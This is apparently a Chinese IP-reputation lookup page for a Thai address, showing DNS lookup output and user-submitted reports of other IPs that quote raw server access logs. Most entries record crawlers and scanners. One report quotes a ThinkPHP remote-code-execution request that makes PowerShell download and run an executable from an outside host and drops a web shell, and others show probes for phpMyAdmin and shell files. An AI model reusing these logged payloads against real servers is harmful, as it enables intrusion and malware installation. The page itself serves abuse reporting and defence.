必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Thailand

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
IP 类型 评论内容 时间
14.207.22.248 attackbotsspam
Automatic report - Port Scan Attack
2020-02-17 13:29:33
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 14.207.22.204
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3798
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;14.207.22.204.			IN	A

;; AUTHORITY SECTION:
.			410	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022022700 1800 900 604800 86400

;; Query time: 59 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 27 17:55:25 CST 2022
;; MSG SIZE  rcvd: 106
HOST信息:
204.22.207.14.in-addr.arpa domain name pointer mx-ll-14.207.22-204.dynamic.3bb.in.th.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
204.22.207.14.in-addr.arpa	name = mx-ll-14.207.22-204.dynamic.3bb.in.th.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
180.97.35.149 bots
不是正常流量
180.97.35.149 - - [09/Apr/2019:06:37:37 +0800] "GET / HTTP/1.1" 301 194 "http://www.baidu.com/s?wd=widetme" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET / HTTP/1.1" 200 3259 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
2019-04-09 06:44:15
80.82.77.33 bots
80.82.77.33 - - [05/Apr/2019:13:44:18 +0800] "GET / HTTP/1.1" 200 10269 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36"
80.82.77.33 - - [05/Apr/2019:13:44:24 +0800] "" 400 0 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:35 +0800] "" 400 0 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:38 +0800] "quit" 400 182 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:41 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 232 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /sitemap.xml HTTP/1.1" 200 1425241 "-" "-"
80.82.77.33 - - [05/Apr/2019:13:44:46 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.13.0"
80.82.77.33 - - [05/Apr/2019:13:44:47 +0800] "" 400 0 "-" "-"
2019-04-05 13:47:49
115.87.27.91 attack
115.87.27.91 - - [04/Apr/2019:18:44:53 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"
2019-04-04 18:46:39
118.25.145.186 attack
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-08 16:47:25
180.97.35.15 bots
据说是百度网讯的节点,反正最近爬的挺频繁的
180.97.35.59 180.97.35.4 180.97.35.5 等
2019-04-06 07:11:18
194.183.5.226 botsattack
194.183.5.226 - - [08/Apr/2019:10:43:42 +0800] "GET //ldskflks HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
194.183.5.226 - - [08/Apr/2019:10:43:43 +0800] "GET //ldskflks HTTP/1.1" 308 249 "http://118.25.52.138:80//ldskflks" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 200 3261 "http://118.25.52.138/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
2019-04-08 10:45:12
121.201.98.53 bots
121.201.98.53 - - [03/Apr/2019:13:30:46 +0800] "GET /index.php/category/root/deep-learning/geoffrey-hinton/ HTTP/1.1" 200 9321 "-" "-"
121.201.98.53 - - [03/Apr/2019:13:30:48 +0800] "GET /index.php/category/root/deep-learning/yann-lecun/ HTTP/1.1" 200 11081 "-" "-"
121.201.98.53 - - [03/Apr/2019:13:30:52 +0800] "GET /index.php/category/root/deep-learning/yoshua-bengio/ HTTP/1.1" 200 11401 "-" "-"
121.201.98.53 - - [03/Apr/2019:13:30:54 +0800] "GET /index.php/category/root/deep-learning/fei-fei-li/ HTTP/1.1" 200 9369 "-" "-"
2019-04-03 13:32:54
42.236.10.78 botsnormal
360爬虫还会搜索,似乎有人为痕迹,还是什么检查。。
42.236.10.78 - - [04/Apr/2019:11:02:06 +0800] "GET /?s=%E4%B9%A0%E8%BF%91%E5%B9%B3 HTTP/1.1" 200 11854 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
2019-04-04 11:08:59
163.177.90.152 attack
163.177.90.152 - - [06/Apr/2019:14:59:21 +0800] "GET /infoo.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
163.177.90.152 - - [06/Apr/2019:14:59:22 +0800] "GET /infoo.php HTTP/1.1" 404 209 "http://118.25.52.138/infoo.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-06 15:00:05
42.56.30.66 attack
42.56.30.66 - - [09/Apr/2019:21:03:03 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
2019-04-09 21:06:38
116.255.152.176 attack
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //ysy.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //ysy.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //lequ.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //lequ.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //plus/laobiao.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //plus/laobiao.php HTTP/1.1" 404 232 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //3G.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //3G.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-10 10:27:18
59.36.119.226 attack
59.36.119.226 - - [06/Apr/2019:14:35:29 +0800] "GET /hm.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
59.36.119.227 - - [06/Apr/2019:14:35:29 +0800] "GET /mysql/admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.186 - - [06/Apr/2019:14:35:29 +0800] "GET /program/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
59.36.119.226 - - [06/Apr/2019:14:35:29 +0800] "GET /hm.php HTTP/1.1" 404 209 "http://118.25.52.138/hm.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
59.36.119.227 - - [06/Apr/2019:14:35:29 +0800] "GET /mysql/admin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/mysql/admin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-06 14:37:06
139.59.26.155 attack
139.59.26.155 - - [07/Apr/2019:22:50:18 +0800] "GET /phpMyAdmin/ HTTP/1.1" 301 194 "-" "ZmEu"
139.59.26.155 - - [07/Apr/2019:22:50:18 +0800] "GET /phpmyadmin/ HTTP/1.1" 301 194 "-" "ZmEu"
2019-04-08 04:57:56
195.231.6.16 attack
端口扫描,攻击IP
2019-04-09 14:39:18
178.154.244.50 bots
yandexbot
178.154.244.50 - - [03/Apr/2019:08:12:31 +0800] "GET /index.php/author/admin/page/3113/ HTTP/1.1" 200 21832 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.244.50 - - [03/Apr/2019:08:12:33 +0800] "GET /index.php/page/982/ HTTP/1.1" 200 17713 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
2019-04-03 08:16:17

最近上报的IP列表

14.207.22.202 14.207.213.155 14.207.22.201 14.207.22.217
29.174.98.199 14.207.22.225 14.207.22.206 14.207.22.226
14.207.22.228 14.207.22.208 14.207.22.233 14.207.22.24
14.207.22.245 14.207.22.246 14.207.22.234 14.207.22.236
14.207.22.251 14.207.22.28 14.207.22.27 14.207.22.3